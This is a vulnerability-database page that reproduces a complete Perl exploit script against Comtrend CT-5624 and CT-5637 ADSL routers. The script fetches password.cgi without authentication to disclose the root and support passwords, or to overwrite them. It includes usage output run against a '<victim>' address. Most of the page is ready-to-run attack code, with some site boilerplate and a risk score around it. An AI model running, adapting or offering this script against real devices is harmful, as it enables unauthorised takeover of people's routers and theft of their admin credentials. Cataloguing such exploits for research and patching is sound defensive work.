Vulners
Lucene search
Comtrend Router CT-5624 Remote Root/Support Password Disclosure
#!/usr/bin/perl
#
# [+] Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit
#
# Author: Todor Donev
# Email: [email protected]@gmail
# Type: Hardware
# Vuln Type: Remote
#
# Tested:
# Board ID : CT-5624
# Software : A011-306TSR-C01_R03
# Bootloader : 1.0.37-0.7-3
# ADSL : A2pB022c3.d20e
#
# Board ID : CT-5637
# Software : A111-312BTC-C01_R12
# Bootloader : 1.0.37-12.1-1
# ADSL : A2pB023k.d20k_rc2
#
#####
# CT-5624 ADSL2+ Ethernet Router
# The CT-5624 series ADSL2+ compact and high performance Ethernet router
# provides four 10/100 Ethernet Interfaces, and one ADSL line interface
# to access the Internet, incorporating LAN or Video on Demand over one
# ordinary telephone line, at speeds of up to 24 Mbps. It also has full
# routing capabilities to segment/route IP protocol, and supports advanced
# security functions.
#####
#
# playground$ perl comtrend.pl -c 192.168.1.1:80
# [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
# [!] Target: 192.168.1.1:80
# [o] New root password: root31337
# [o] New support password: sup31337
# [*] Successfully !!
##
# playground$ perl comtrend.pl -d 192.168.1.1:80
# [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
# [!] Target: 192.168.1.1:80
# [o] root: root31337
# [o] support: sup31337
##
# playground$ perl comtrend.pl
# [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
# [!] usg: perl comtrend.pl [-c or -d] <victim>
# [!] -d: Disclosure Root/Support password
# [!] -c: Change Root/Support password
#
#####
# Thanks to Tsvetelina Emirska
# for the help and support which gives me =)
#####
use LWP::Simple;
print "[+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit\n";
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
if ($type eq "-d") {
my $r = get("http://$t/password.cgi") or die("suck!");
print "[!] Target: $t\n";
if ($r =~ m/pwdAdmin = '(.*)';/g) {
$result .= "[o] root: $1\n";
}
if ($r =~ m/pwdSupport = '(.*)';/g) {
$result .= "[o] support: $1\n";
print $result;
}}}
if ($type eq "-c") {
print "[!] Target: $t\n";
print "[o] New root password: ";
my $rootpass=<STDIN>;
chomp($rootpass);
print "[o] New support password: ";
my $suppass=<STDIN>;
chomp($suppass);
my $r = get("http://$t/password.cgi?sysPassword=$rootpass&sptPassword=$suppass") or die("suck!");
if ($r =~ m/pwdAdmin = '$rootpass';/g) {
print "[*] Successfully !!\n";
}}
sub usg(){
print "[!] usg: perl comtrend.pl [-c or -d] <victim>\n";
print "[!] -d: Disclosure Root/Support password\n";
print "[!] -c: Change Root/Support password\n";
exit;
}
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Nov 2011 00:00Current
7.1High risk
Vulners AI Score7.1